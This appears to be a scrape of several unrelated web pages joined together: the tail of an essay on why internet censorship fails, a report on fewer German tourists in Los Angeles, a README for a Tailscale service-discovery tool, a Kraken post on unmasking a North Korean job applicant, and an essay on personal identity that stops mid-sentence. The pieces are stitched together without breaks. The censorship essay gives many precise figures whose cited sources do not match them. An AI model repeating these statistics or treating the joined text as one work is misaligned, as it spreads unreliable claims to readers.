in the immediate aftermath as users found and shared workarounds.
[link]
3. Splash Damage: The Unavoidable Collateral Impact
Internet censorship is not surgical—it’s more akin to carpet bombing in the digital space. The internet’s infrastructure is built on shared resources, interconnected systems, and layered services. This architecture makes precise targeting virtually impossible. When authorities block infrastructure providers like Cloudflare or entire communications platforms like ProtonMail, they disrupt access to an enormous range of legitimate services. This affects journalists communicating with sources, businesses protecting sensitive communications, educational institutions, healthcare providers, and countless other legitimate users. The Internet Society’s comprehensive 2017 report on content blocking
Internet Society
- Internet Shutdowns and Content Blocking not the answer
found that all major censorship techniques produce substantial collateral damage:
IP blocking:
Frequently blocks innocent websites, users, and services sharing the same IP address
DNS blocking:
Affects all services on a domain, not just problematic content
Deep packet inspection:
Creates security vulnerabilities and performance issues
URL filtering:
Often over-blocks related content and under-blocks target content
This technical reality means there is no “clean” way to implement censorship without affecting legitimate users and services—a fundamental architectural limitation of the internet that cannot be engineered away.
[link]
4. Technological Arms Race: The Never-Ending Game of Cat and Mouse
Internet censorship initiates a technological arms race with a predictable pattern:
Authorities implement a censorship technique
Services and users develop countermeasures
Authorities respond with more sophisticated censorship
Services and users deploy more advanced circumvention
This pattern has played out repeatedly across decades of internet governance attempts worldwide. When messaging apps are blocked, they implement domain fronting techniques. When websites are censored, mirror sites proliferate. When email services are restricted, encrypted alternatives emerge.
Research from the Oxford Internet Institute’s Internet Policy Observatory
MIT Press
- Access Controlled
has documented how this technological evolution consistently outpaces censorship efforts:
Blocking methods typically remain effective for only 3-6 months before widespread circumvention develops
Each new generation of censorship requires exponentially more resources to implement
Circumvention techniques become progressively easier to use and more accessible to average users
The costs to authorities increase while the costs to users decrease over time
This asymmetric dynamic heavily favors the circumvention side, making censorship a temporary solution at best and often merely symbolic after initial implementation.
[link]
History Repeats Itself:
Case Studies in Failed Censorship
History provides ample evidence that website blocking rarely achieves its intended goals:
When Turkey blocked YouTube for insulting content related to Atatürk, network traffic analysis revealed that YouTube usage actually increased by 33% during the ban. According to research published in the International Journal of Communication, approximately 70% of Turkish internet users learned to use DNS redirection or proxy services for the first time. Turkish users rapidly shared circumvention techniques through text messages and forums, with an estimated 4.5 million Turkish users regularly accessing YouTube despite the official block. By the ban’s end, VPN usage in Turkey had increased from under 10% to over 30% of internet users.
When the UK implemented court-ordered ISP blocks of The Pirate Bay in 2012, research by the University of Amsterdam
UvA-DARE
- Global Online Piracy Study, (Page 27-28)
found that P2P traffic dropped initially but normalized to pre-block levels within just 7 days. Traffic analysis showed that within one month, there were over 300 functioning Pirate Bay proxy sites being used by UK users. Perhaps most telling: during the first year of blocking, the number of UK-based Pirate Bay users increased by approximately 12%, despite the “block.” Technical monitoring revealed that users rapidly shifted to using VPNs, proxy services, alternative DNS servers, Tor, and mirror sites.
Russia’s communications regulator Roskomnadzor blocked over 19 million IP addresses in an attempt to disrupt Telegram. Despite this massive action, Telegram’s usage in Russia dropped by only 7% for approximately three days before exceeding pre-block levels. Within two weeks, Telegram had gained approximately 500,000 new Russian users. To circumvent the block, Telegram implemented domain fronting techniques using Google and Amazon cloud services, prompting Russia to inadvertently block millions of innocent websites and services. By the time Russia officially abandoned the blocking effort in 2020, Telegram had nearly doubled its Russian user base to 30 million.
China has invested an estimated $6-10 billion annually in its censorship infrastructure—the most sophisticated system in the world. Despite this enormous investment, studies by Citizen Lab Report
Citizen Lab Report
- Search Monitor Project: Toward a Measure of Transparency
show that between 29-35% of Chinese internet users regularly employ VPNs to bypass censorship. China’s technical cat-and-mouse game includes deep packet inspection that can detect and block many VPN protocols, yet new obfuscation techniques like Shadowsocks (created by a Chinese programmer in 2012) are continuously developed and widely used. Even after China criminalized unauthorized VPN usage in 2018 with penalties of up to $2,200, VPN usage has continued to grow at approximately 5-7% annually.
[link]
Noble Intentions, Same Technical Failures:
Censorship Under Different Pretexts
Not all censorship attempts are made to suppress political opposition or protect business interests. In recent years, governments have increasingly justified internet restrictions as necessary to combat misinformation or protect “national interests.” These efforts face the same technical limitations:
Brazil’s Election Misinformation Efforts (2018-2022)
: During Brazil’s contentious elections, the Superior Electoral Court ordered the blocking of dozens of news sites and social media accounts accused of spreading election misinformation. Despite deploying sophisticated content filtering, technical analysis showed that within 48 hours, over 85% of the blocked content had migrated to alternative domains, Telegram channels, and WhatsApp groups. Court documents revealed that for every account blocked, an average of 3.7 mirror accounts appeared elsewhere, often with larger audiences due to the “forbidden information” appeal.
Turkey’s “National Security” Blocks (2016-present)
: Following the 2016 coup attempt, Turkey blocked over 240,000 websites and 150,000 URLs under national security provisions. Network measurement studies by the Internet Society found that despite this massive effort, politically sensitive content saw a 42% increase in circulation through encrypted messaging apps and VPN-protected social media. By 2020, Turkey had the second-highest VPN adoption rate globally at 32% of internet users—a direct consequence of the censorship regime.
India’s “Public Order” Shutdowns
: India leads the world in regional internet shutdowns, implementing over 400 since 2016, often justified by preventing the spread of rumors that could lead to violence. Research from the Internet Freedom Foundation found that during shutdowns, misinformation actually increased by 33-41% in affected regions as legitimate news sources became inaccessible while rumors spread through SMS and offline networks. The technical inability to selectively block only “harmful” content led to blanket approaches that proved counterproductive.
South Korea’s “Fake News” Regulations
: South Korea’s attempts to algorithmically identify and block “fake news” through its comprehensive filtering system demonstrated the technical impossibility of accurate content classification. A 2021 Seoul National University
Seoul National University
- Fact-Checking and Audience Engagement
study found the system had a 37% false positive rate—blocking legitimate news and commentary—while missing 42% of content that violated the same standards but used simple evasion techniques like image-based text or deliberate misspellings.
These examples demonstrate that regardless of intention—whether preventing harm from misinformation or protecting alleged national interests—the technical limitations of internet censorship remain constant. Well-intentioned efforts face the same circumvention techniques, collateral damage problems, and ultimate ineffectiveness as more obviously self-interested censorship attempts. The internet’s distributed architecture fundamentally resists centralized content control, regardless of the justification behind that control.
For more comprehensive reading on Internet freedom and accessibility to political rights and civil liberties, by country, check out
Freedom House - Country Scores
.
[link]
Beyond Censorship:
Addressing Root Causes with Technical Solutions
Effective approaches to online problems typically address underlying issues rather than symptoms:
Market-Based Solutions to Piracy:
Research consistently shows that improving legal access to content at reasonable prices dramatically reduces piracy. When Netflix entered new markets, piracy rates measurably declined, according to a 2018 study by the European Commission’s Joint Research Centre.
EU JRC
- Online Copyright Enforcement, Consumer Behavior, and Market Structure
This study found that for every 4.7% increase in legal streaming service subscriptions, there was a 3.1% decrease in visits to illegal streaming sites.
Spotify’s expansion across Europe similarly correlated with significant decreases in music piracy. When content is:
Affordable
Easily accessible
Provided with good user experience
Available without delays
…the incentive to seek illegal alternatives naturally diminishes.
Targeted Enforcement for Abusive Communications:
Rather than blocking entire platforms like ProtonMail, digital forensics and international legal cooperation have proven more effective against targeted abuse. Email headers, server logs, and digital footprints can often identify perpetrators even when they use privacy-focused services.
Law enforcement agencies with proper training and resources can work through established legal channels such as Mutual Legal Assistance Treaties (MLATs) to request specific information from service providers about abusive accounts, all without disrupting service for legitimate users.
Collaborative Content Moderation Frameworks:
For harmful content issues, multi-stakeholder approaches that bring together platforms, civil society, and governments to establish transparent content moderation standards have shown more long-term success than blocking. The Global Internet Forum to Counter Terrorism (GIFCT) demonstrates how cross-platform cooperation can address specific problematic content while preserving overall access and functionality.
[link]
Conclusion:
Technical Reality vs. Political Expediency
The technical reality of internet architecture makes censorship fundamentally flawed as a policy approach. It resembles trying to stop a river with a chain-link fence—water simply flows around it, while debris gets caught.
When policymakers and authorities implement internet censorship, they’re often choosing political expediency over technical effectiveness. Censorship appears decisive and creates the impression of immediate action—a press release can announce that something has been “blocked” and the problem “solved.” This political expediency—prioritizing the appearance of action over actual results—explains why censorship remains popular despite decades of technical evidence demonstrating its ineffectiveness.
What we consistently observe across different countries and contexts is that internet censorship creates:
A false sense of action without addressing underlying problems
Technical workarounds that quickly render censorship ineffective
Significant collateral damage to legitimate users and services
Educational opportunities that actually increase technical literacy around circumvention
The gap between political expediency and technical reality continues to widen. While blocking ProtonMail or Cloudflare might satisfy short-term political needs to appear “tough on crime” or “protective of intellectual property,” the technical architecture of the internet ensures these measures will fail to achieve their stated objectives while causing substantial collateral damage.
As we navigate complex digital challenges like piracy, harmful communications, and content moderation, effective approaches must work with, rather than against, the internet’s technical architecture. Solutions that address economic incentives, create proper accountability mechanisms, and establish collaborative governance frameworks have consistently outperformed censorship in both effectiveness and minimizing collateral damage.
The recent censorship attempts in various countries are likely to follow the same well-documented pattern we’ve seen for over two decades: temporary disruption followed by widespread circumvention, with legitimate users bearing the greatest burden. This isn’t a political conclusion—it’s what the technical evidence consistently demonstrates.
Recession Indicator: Bookings for the German Tour Bus in Los Angeles Are Down 30%
I live close to the famous Venice Beach boardwalk in Los Angeles, one of the most popular tourist spots in California and, by extension, the United States. The Venice Beach boardwalk is so famous, in fact, that it is one of just a few stops on
Sandra & Dennis’s German-language bus tours
. Every summer, I will be walking my dog and dozens of people visiting from Germany will hop off the bus to “experience the American way of life” at a famous beach that has been in many movies, is famous for Muscle Beach, the skatepark, the surfing, and the many trashy t-shirt and souvenir shops.
These throngs of tourists are just one small part of Los Angeles’ tourism industry, but they are a hyperspecific one. Almost everyone who does these tours is visiting the United States from Germany. By all accounts, tourism to the United States has plummeted due to the Trump
administration detaining random tourists
, plummeting perceptions and boycotts of the United States due to his trade war, and the fact he is sending some immigrants to the El Salvadorian megaprison CECOT. Many countries
have issued travel advisories
for tourists wanting to visit the United States, and Goldman Sachs
estimates that the U.S. could miss out
on as much as $90 billion in revenue from a fall in tourism and Trump’s trade war.
The American tourism industry is sooooooo screwed.
Tuesday, Trump said “
tourism is way up
,” a ludicrous statement that is refuted by every statistic or bit of information that we have seen so far. Here is another anecdotal data point: Sandra & Dennis’s bus tours, which cater directly to German tourists, have seen a 30 percent drop in bookings from German visitors this summer.
In most cases, accurately estimating the impact of Trump’s haphazard and messy immigration policies on any individual business is quite difficult. But because Sandra & Dennis’s bus tours cater directly to German tourists, I thought I would email them to see if there has been an impact on their business. Their
company’s website is entirely in German
, even though the company itself is based in Los Angeles. Owner Dennis Sulies responded quickly, and said that the company has “definitely noticed a drop—about 30 percent—in bookings from German visitors to LA.”
Sulies said that it remains difficult for him to determine what percentage drop is due to Trump’s policies and how much of it is
due to the wildfires that devastated Los Angeles
in January. The wildfires were not Trump’s fault, but, in one of his first acts as President, Trump portrayed Los Angeles as a hellhole; most of Los Angeles remains totally open. Trump’s administration, meanwhile, has gutted FEMA and climate research arms of the government.
“The decline started earlier this year, and while the current tariff discussions are certainly a factor, the first major hit came in January. That’s when a lot of families typically plan their vacations, and unfortunately, media reports in Germany were showing LA as being engulfed in wildfires. That really discouraged early bookings,” Sulies said. “The political climate, including Trump’s return and administration policies, has added to the general uncertainty. So while the tariffs are a newer concern, the combination of media coverage and political shifts has already had a visible impact on tourism from Germany.”
“That said, we’ve also seen a small positive effect from falling airfares. Lower prices are attracting new, more spontaneous travelers who jump on last-minute bargain flights to the U.S. It’s a different customer segment, but it helps balance things out a bit. As for immigration, most Europeans—including our German guests—enter with an ESTA, and we haven’t heard any specific issues or complaints. The entry process still seems to be running fairly smoothly,” he added. “Overall, we still believe the U.S. is a safe and welcoming country to visit, regardless of the administration in power.” ESTA is an online visa waiver program available to tourists from the European Union and from several other countries.
If the last thing you heard about LA was the fires, I live here and I can tell you that the vast majority of the city remains fully functioning and a perfectly good place for tourists to visit despite the awful tragedy of the fires. That being said, it is completely understandable that international visitors would decide not to come here as the Trump administration threatens undocumented immigrants, people here on visas, and tourists and wages a unilateral trade war on the entire world. The losers in this case are the American businesses and cities that rely on tourists and the revenue they bring in to make ends meet.
About the author
Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.
minidisc: Zero-config service discovery for Tailscale networks
Lobsters
github.com
2025-05-01 15:53:45
It enables seamless advertisement and discovery of gRPC or REST services across a Tailnet without the need for a centralized server. Services equipped with Minidisc form a lightweight peer-to-peer network, ensuring that as long as a service is active, it remains discoverable.
Comments...
Zero-config service discovery for Tailscale networks
With minidisc, you can advertise and discover gRPC or REST services on your
Tailnet with zero configuration. There's no need to run a server either —
minidisc-enabled services form a simple peer-to-peer network, so as long as a
service is up, you can discover it.
Status
For now, primary support is available for Python and Go. Other languages can
rely on the command line tool
md
as a stop gap. The only verified platform is
Linux.
At the time of writing, Minidisc is in active use at the author's own work and
has been performing nicely, but overall this system has only little mileage. If
you need something battle-hardened, Minidisc isn't for you yet. But if it looks
useful to you, do give it a try and let me know how it goes!
How to use
Client
Minidisc maps service names and sets of key-value labels to IP:port pairs. To
find a service, you specify the name and a (sub)set of labels you care about.
Minidisc then returns the address of the first match it finds.
For example, to create a gRPC channel in Python you can do this:
importgrpcimportminidiscendpoint=minidisc.find_service('myservice', {'env': 'prod'})
channel=grpc.insecure_channel(endpoint)
# ... now use the channel to create gRPC stubs.
Or if you'd rather have a list of all available services to pick and choose
from, call
minidisc.list_services()
.
In Go, things work similarly:
import (
"log""github.com/mscheidegger/minidisc/go/pkg/minidisc""google.golang.org/grpc""google.golang.org/grpc/credentials/insecure"
)
funcmain() {
labels:=map[string]string{"env": "prod"}
addr, err:=minidisc.FindService("myservice", labels)
iferr!=nil {
log.Fatalf("Minidisc is unavailable: %v", err)
}
clientConn, err:=grpc.NewClient(
addr.String(),
grpc.WithTransportCredentials(insecure.NewCredentials()),
)
// ... now use the clientConn.
}
If you're limiting yourself to Go and gRPC, there's also a fancier way to do the
same, a custom resolver. With this, you can use URLs to find Minidisc services:
import (
"github.com/mscheidegger/minidisc/go/pkg/mdgrpc""google.golang.org/grpc""google.golang.org/grpc/credentials/insecure"
)
funcmain() {
mdgrpc.RegisterResolver()
clientConn, err:=grpc.NewClient(
"minidisc://myservices?env=prod",
grpc.WithTransportCredentials(insecure.NewCredentials()),
)
// ... now use the clientConn.
}
Server
A server on the Tailnet advertises its services by starting a Minidisc Registry
and then adding entries. Everything else happens automatically in the
background.
For Go:
import (
"github.com/mscheidegger/minidisc/go/pkg/minidisc"
)
funcmain() {
// Initialise the service at "port", then...registry, err:=minidisc.StartRegistry()
iferr!=nil {
log.Fatalf("Minidisc is unavailable: %v", err)
}
labels:=map[string]string{"env": "prod"}
registry.AdvertiseService(port, "myservice", labels)
// Now you can enter the serving loop.
}
After this, the registry will advertise your service to the Tailnet as long as
your process stays alive (and you don't turn off Tailscale). For Python it's
similar:
importminidisc# Set up your service...registry=minidisc.start_registry()
registry.advertise_service(port, 'myservice', {'env': 'prod'})
# Now enter the serving loop.
Command line
In addition to the Go and Python libraries, there's also the command line tool
md
, which offers similar functionality.
To list all services on the Tailnet:
To find a matching service:
md find myservice env=prod
Most importantly,
md
also lets you advertise services of servers that don't
support Minidisc themselves:
The
md
tool is also available as a
Docker
image
(but see the section on Docker for how to make things work).
Docker
Minidisc unfortunately doesn't work out-of-the-box when run in Docker with a
Tailscale sidecar as described in the
Tailscale
documentation
. With the default setup
suggested in the docs, the necessary Unix Domain Socket of
tailscaled
is only
available within the sidecar, not the main Docker container.
The easiest way to make this work is to put the socket into a shared volume in
your
compose.yaml
. Here's an example:
The top-level volume
tailscale-socket
. This allows
foobar
to access the
tailscaled
daemon. Note how it's used in both containers.
Setting
TS_SOCKET
. The Tailscale Docker image defaults to putting the socket
into
/tmp
otherwise.
With these changes, Minidisc should work inside the foobar container.
Behind the scenes
The discovery network
At its core, Minidisc is a simplistic peer-to-peer network. Because Tailnets
provide a trusted environment with a known, relatively small set of network
hosts (just run
tailscale status
to see them), we can skip most of the
bootstrapping and routing magic that "real" peer-to-peer networks do.
Minidisc nodes all attempt to bind to the same port 28004 on their local Tailnet
address (100.x.x.x). When a client wants to list advertised services, it will
simply enumerate all online IPs on the Tailnet and try to contact port 28004 on
each — a manual broadcast if you will.
If a node can't bind to port 28004, it can instead bind to an arbitrary port
available on its IP and register this port as a
delegate
on another node that
did
bind to 28004 (the
leader
). After this registration, the leader will not
only advertise its own services, but also the delegate's. This continues until
the connection between the two breaks off (usually because one of the processes
died). At that point, the leader will deregister the delegate, and the delegate
will rejoin the network, attempting to become a leader again.
We identified a North Korean hacker who tried to get a job at Kraken
Every day, our dedicated security and IT teams successfully repel a wide range of attacks from various bad actors. From our years of experience, we know how vast the attack vectors of any major company are. And as we’re disclosing today, they can include unexpected areas, such as the company’s recruitment process.
Our teams recently identified a North Korean hacker’s attempts to infiltrate our ranks by applying for a job at Kraken.
Watch CBS News’ full coverage of how Kraken identified — and then strategically interacted with — a North Korean hacker who tried to get a job at Kraken
What started as a routine hiring process for an engineering role quickly turned into an intelligence gathering operation, as our teams carefully advanced the candidate through our hiring process to learn more about their tactics at every stage of the process.
This is an established challenge for the crypto community, with
estimates
indicating that North Korean hackers stole over $650 million from crypto firms in 2024 alone. We’re disclosing these events today as part of our ongoing transparency efforts and to help companies, both in crypto and beyond, to strengthen their defenses.
The candidate’s red flags
From the outset, something felt off about this candidate. During their initial call with our recruiter, they joined under a different name from the one on their resume, and quickly changed it. Even more suspicious, the candidate occasionally switched between voices, indicating that they were being coached through the interview in real time.
Before this interview, industry partners had tipped us off that North Korean hackers were actively applying for jobs at crypto companies. We received a list of email addresses linked to the hacker group, and one of them matched the email the candidate used to apply to Kraken.
With this intelligence in hand, our Red Team launched an investigation using Open-Source Intelligence gathering (OSINT) methods. One method involved analyzing breach data, which hackers often use to identify users with weak or reused passwords. In this instance, we discovered that one of the emails associated with the malicious candidate was part of a larger network of fake identities and aliases.
This meant that our team had uncovered a hacking operation where one individual had established multiple identities to apply for roles in the crypto space and beyond. Several of the names had previously been hired by multiple companies, as our team identified work-related email addresses linked to them. One identity in this network was also a known foreign agent on the sanctions list.
As our team dug deeper into the candidate’s history and credentials, technical inconsistencies emerged
The candidate used remote colocated Mac desktops but interacted with other components through a VPN, a setup commonly deployed to hide location and network activity.
Their resume was linked to a GitHub profile containing an email address exposed in a past data breach.
The candidate’s primary form of ID appeared to be altered, likely using details stolen in an identity theft case two years prior.
By this point, the evidence was clear, and our team was confident this wasn’t just a suspicious job applicant, but a state-sponsored infiltration attempt.
Turning the tables – how our team responded
Instead of tipping off the applicant, our security and recruitment teams strategically advanced them through our rigorous recruitment process – not to hire, but to study their approach. This meant putting them through multiple rounds of technical infosec tests and verification tasks, designed to extract key details about their identity and tactics.
The final round interview? A casual chemistry interview with Kraken’s Chief Security Officer (CSO) Nick Percoco and several other team members. What the candidate didn’t realize was that this was a trap – a subtle but deliberate test of their identity.
Between standard interview questions, our team slipped in two-factor authentication prompts, such as asking the candidate to verify their location, hold up a government-issued ID, and even recommend some local restaurants in the city they claimed to be in.
At this point, the candidate unraveled. Flustered and caught off guard, they struggled with the basic verification tests, and couldn’t convincingly answer real-time questions about their city of residence or country of citizenship. By the end of the interview, the truth was clear: this was not a legitimate applicant, but an imposter attempting to infiltrate our systems.
Commenting on the events, CSO Nick Percoco, said:
“Don’t trust, verify. This core crypto principle is more relevant than ever in the digital age. State-sponsored attacks aren’t just a crypto, or U.S. corporate, issue – they’re a global threat. Any individual or business handling value is a target, and resilience starts with operationally preparing to withstand these types of attacks.”
Key takeaways
Not all attackers break in, some try to walk through the front door. As cyber threats evolve, so must our security strategies. A holistic, proactive approach is critical to protect an organization.
Generative AI is making deception easier, but isn’t foolproof. Attackers can trick parts of the hiring process, like a technical assessment, but genuine candidates will usually pass real-time, unprompted verification tests. Try to avoid patterns in the types of verification questions that hiring managers use.
A culture of productive paranoia is key. Security isn’t just an IT responsibility. In the modern era, it’s an organizational mindset. By actively engaging this individual, we identified areas to strengthen our defenses against future infiltration attempts.
The next time a suspicious job application comes through remember: Sometimes, the biggest threats come disguised as opportunities.
I have few memories of being four—a fact I find disconcerting now that I’m the father of a four-year-old. My son and I have great times together; lately, we’ve been building Lego versions of familiar places (the coffee shop, the bathroom) and perfecting the “flipperoo,” a move in which I hold his hands while he somersaults backward from my shoulders to the ground. But how much of our joyous life will he remember? What I recall from when I was four are the red-painted nails of a mean babysitter; the brushed-silver stereo in my parents’ apartment; a particular orange-carpeted hallway; some houseplants in the sun; and a glimpse of my father’s face, perhaps smuggled into memory from a photograph. These disconnected images don’t knit together into a picture of a life. They also fail to illuminate any inner reality. I have no memories of my own feelings, thoughts, or personality; I’m told that I was a cheerful, talkative child given to long dinner-table speeches, but don’t remember being so. My son, who is happy and voluble, is so much fun to be around that I sometimes mourn, on his behalf, his future inability to remember himself.
If we could see our childish selves more clearly, we might have a better sense of the course and the character of our lives. Are we the same people at four that we will be at twenty-four, forty-four, or seventy-four? Or will we change substantially through time? Is the fix already in, or will our stories have surprising twists and turns? Some people feel that they’ve altered profoundly through the years, and to them the past seems like a foreign country, characterized by peculiar customs, values, and tastes. (Those boyfriends! That music! Those outfits!) But others have a strong sense of connection with their younger selves, and for them the past remains a home. My mother-in-law, who lives not far from her parents’ house in the same town where she grew up, insists that she is the same as she’s always been, and recalls with fresh indignation her sixth birthday, when she was promised a pony but didn’t get one. Her brother holds the opposite view: he looks back on several distinct epochs in his life, each with its own set of attitudes, circumstances, and friends. “I’ve walked through many doorways,” he’s told me. I feel this way, too, although most people who know me well say that I’ve been the same person forever.
Try to remember life as you lived it years ago, on a typical day in the fall. Back then, you cared deeply about certain things (a girlfriend? Depeche Mode?) but were oblivious of others (your political commitments? your children?). Certain key events—college? war? marriage? Alcoholics Anonymous?—hadn’t yet occurred. Does the self you remember feel like you, or like a stranger? Do you seem to be remembering yesterday, or reading a novel about a fictional character?
If you have the former feelings, you’re probably a continuer; if the latter, you’re probably a divider. You might prefer being one to the other, but find it hard to shift your perspective. In the poem “The Rainbow,” William Wordsworth wrote that “the Child is Father of the Man,” and this motto is often quoted as truth. But he couched the idea as an aspiration—“And I could wish my days to be / Bound each to each by natural piety”—as if to say that, though it would be nice if our childhoods and adulthoods were connected like the ends of a rainbow, the connection could be an illusion that depends on where we stand. One reason to go to a high-school reunion is to feel like one’s past self—old friendships resume, old in-jokes resurface, old crushes reignite. But the time travel ceases when you step out of the gym. It turns out that you’ve changed, after all.
On the other hand, some of us want to disconnect from our past selves; burdened by who we used to be or caged by who we are, we wish for multipart lives. In the voluminous autobiographical novel “My Struggle,” Karl Ove Knausgaard—a middle-aged man who hopes to be better today than he was as a young man—questions whether it even makes sense to use the same name over a lifetime. Looking at a photograph of himself as an infant, he wonders what that little person, with “arms and legs spread, and a face distorted into a scream,” really has to do with the forty-year-old father and writer he is now, or with “the gray, hunched geriatric who in forty years from now might be sitting dribbling and trembling in an old people’s home.” It might be better, he suggests, to adopt a series of names: “The fetus might be called Jens Ove, for example, and the infant Nils Ove . . . the ten- to twelve-year-old Geir Ove, the twelve- to seventeen-year-old Kurt Ove . . . the twenty-three- to thirty-two-year-old Tor Ove, the thirty-two- to forty-six-year-old Karl Ove—and so on.” In such a scheme, “the first name would represent the distinctiveness of the age range, the middle name would represent continuity, and the last, family affiliation.”
My son’s name is Peter. It unnerves me to think that he could someday become so different as to warrant a new name. But he learns and grows each day; how could he not be always becoming someone new? I have duelling aspirations for him: keep growing; keep being you. As for how he’ll see himself, who knows? The philosopher Galen Strawson believes that some people are simply more “episodic” than others; they’re fine living day to day, without regard to the broader plot arc. “I’m somewhere down towards the episodic end of this spectrum,” Strawson writes in an essay called “
The Sense of the Self
.” “I have no sense of my life as a narrative with form, and little interest in my own past.”
Perhaps Peter will grow up to be an episodic person who lives in the moment, unconcerned with whether his life forms a whole or a collection of parts. Even so, there will be no escaping the paradoxes of mutability, which have a way of weaving themselves into our lives. Thinking of some old shameful act of ours, we tell ourselves, “I’ve changed!” (But have we?) Bored with a friend who’s obsessed with what happened long ago, we say, “That was another life—you’re a different person now!” (But is she?) Living alongside our friends, spouses, parents, and children, we wonder if they’re the same people we’ve always known, or if they’ve lived through changes we, or they, struggle to see. Even as we work tirelessly to improve, we find that, wherever we go, there we are (in which case what’s the point?). And yet sometimes we recall our former selves with a sense of wonder, as if remembering a past life. Lives are long, and hard to see. What can we learn by asking if we’ve always been who we are?
The question of our continuity has an empirical side that can be answered scientifically. In the nineteen-seventies, while working at the University of Otago, in New Zealand, a psychologist named Phil Silva helped launch a study of a thousand and thirty-seven children; the subjects, all of whom lived in or around the city of Dunedin, were studied at age three, and again at five, seven, nine, eleven, thirteen, fifteen, eighteen, twenty-one, twenty-six, thirty-two, thirty-eight, and forty-five, by researchers who often interviewed not just the subjects but also their family and friends. In 2020, four psychologists associated with the Dunedin study—Jay Belsky, Avshalom Caspi, Terrie E. Moffitt, and Richie Poulton—summarized what’s been learned so far in a book called “
The Origins of You: How Childhood Shapes Later Life
.” It folds in results from a few related studies conducted in the United States and the United Kingdom, and so describes how about four thousand people have changed through the decades.
John Stuart Mill once wrote that a young person is like “a tree, which requires to grow and develop itself on all sides, according to the tendency of the inward forces which make it a living thing.” The image suggests a generalized spreading out and reaching up, which is bound to be affected by soil and climate, and might be aided by a little judicious pruning here and there. The authors of “The Origins of You” offer a more chaotic metaphor. Human beings, they suggest, are like storm systems. Each individual storm has its own particular set of traits and dynamics; meanwhile, its future depends on numerous elements of atmosphere and landscape. The fate of any given Harvey, Allison, Ike, or Katrina might be shaped, in part, by “air pressure in another locale,” and by “the time that the hurricane spends out at sea, picking up moisture, before making landfall.” Donald Trump, in 2014, told a biographer that he was the same person in his sixties that he’d been as a first grader. In his case, the researchers write, the idea isn’t so hard to believe. Storms, however, are shaped by the world and by other storms, and only an egomaniacal weather system believes in its absolute and unchanging individuality.
Efforts to understand human weather—to show, for example, that children who are abused bear the mark of that abuse as adults—are predictably inexact. One problem is that many studies of development are “retrospective” in nature: researchers start with how people are doing now, then look to the past to find out how they got that way. But many issues trouble such efforts. There’s the fallibility of memory: people often have difficulty recalling even basic facts about what they lived through decades earlier. (Many parents, for instance, can’t accurately remember whether a child was diagnosed as having A.D.H.D.; people even have trouble remembering whether their parents were mean or nice.) There’s also the problem of enrollment bias. A retrospective study of anxious adults might find that many of them grew up with divorced parents—but what about the many children of divorce who didn’t develop anxiety, and so were never enrolled in the study? It’s hard for a retrospective study to establish the true import of any single factor. The value of the Dunedin project, therefore, derives not just from its long duration but also from the fact that it is “prospective.” It began with a thousand random children, and only later identified changes as they emerged.
Working prospectively, the Dunedin researchers began by categorizing their three-year-olds. They met with the children for ninety minutes each, rating them on twenty-two aspects of personality—restlessness, impulsivity, willfulness, attentiveness, friendliness, communicativeness, and so on. They then used their results to identify five general types of children. Forty per cent of the kids were deemed “well-adjusted,” with the usual mixture of kid personality traits. Another quarter were found to be “confident”—more than usually comfortable with strangers and new situations. Fifteen per cent were “reserved,” or standoffish, at first. About one in ten turned out to be “inhibited”; the same proportion were identified as “undercontrolled.” The inhibited kids were notably shy and exceptionally slow to warm up; the undercontrolled ones were impulsive and ornery. These determinations of personality, arrived at after brief encounters and by strangers, would form the basis for a half century of further work.
By age eighteen, certain patterns were visible. Although the confident, reserved, and well-adjusted children continued to be that way, those categories were less distinct. In contrast, the kids who’d been categorized as inhibited or as undercontrolled had stayed truer to themselves. At age eighteen, the once inhibited kids remained a little apart, and were “significantly less forceful and decisive than all the other children.” The undercontrolled kids, meanwhile, “described themselves as danger seeking and impulsive,” and were “the least likely of all young adults to avoid harmful, exciting, and dangerous situations or to behave in reflective, cautious, careful, or planful ways.” Teen-agers in this last group tended to get angry more often, and to see themselves “as mistreated and victimized.”
The researchers saw an opportunity to streamline their categories. They lumped together the large group of teen-agers who didn’t seem to be on a set path. Then they focussed on two smaller groups that stood out. One group was “moving away from the world,” embracing a way of life that, though it could be perfectly rewarding, was also low-key and circumspect. And another, similarly sized group was “moving against the world.” In subsequent years, the researchers found that people in the latter group were more likely to get fired from their jobs and to have gambling problems. Their dispositions were durable.
That durability is due, in part, to the social power of temperament, which, the authors write, is “a machine that designs another machine, which goes on to influence development.” This second machine is a person’s social environment. Someone who moves against the world will push others away, and he’ll tend to interpret the actions of even well-meaning others as pushing back; this negative social feedback will deepen his oppositional stance. Meanwhile, he’ll engage in what psychologists call “niche picking”—the favoring of social situations that reinforce one’s disposition. A “well-adjusted” fifth grader might actually “look forward to the transition to middle school”; when she gets there, she might even join some clubs. Her friend who’s moving away from the world might prefer to read at lunch. And her brother, who’s moving against the world—the group skews slightly male—will feel most at home in dangerous situations.
Through such self-development, the authors write, we curate lives that make us ever more like ourselves. But there are ways to break out of the cycle. One way in which people change course is through their intimate relationships. The Dunedin study suggests that, if someone who tends to move against the world marries the right person, or finds the right mentor, he might begin to move in a more positive direction. His world will have become a more beneficent co-creation. Even if much of the story is written, a rewrite is always possible.
The Dunedin study tells us a lot about how differences between children matter over time. But how much can this kind of work reveal about the deeper, more personal question of our own continuity or changeability? That depends on what we mean when we ask who we are. We are, after all, more than our dispositions. All of us fit into any number of categories, but those categories don’t fully encompass our identities.
There’s an important sense, first of all, in which who you are is determined not by what you’re like but by what you do. Imagine two brothers who grow up sharing a bedroom, and who have similar personalities—intelligent, tough, commanding, and ambitious. One becomes a state senator and university president, while the other becomes a Mob boss. Do their parallel temperaments make them similar people? Those who’ve followed the stories of William Bulger and James (Whitey) Bulger—the Boston brothers who ran the Massachusetts Senate and the underworld, respectively—sometimes suggest that they were more alike than different. (“They’re both very tough in their respective fields,” a biographer observed.) But we’d be right to be skeptical of such an outlook, because it requires setting aside the wildly different substances of the brothers’ lives. At the Pearly Gates, no one will get them confused.
“He’s more interesting poolside.”
Cartoon by Liza Donnelly
The Bulger brothers are extraordinary; few of us break so bad or good. But we all do surprising things that matter. In 1964, the director Michael Apted helped make “Seven Up!,” the first of a
series of documentaries
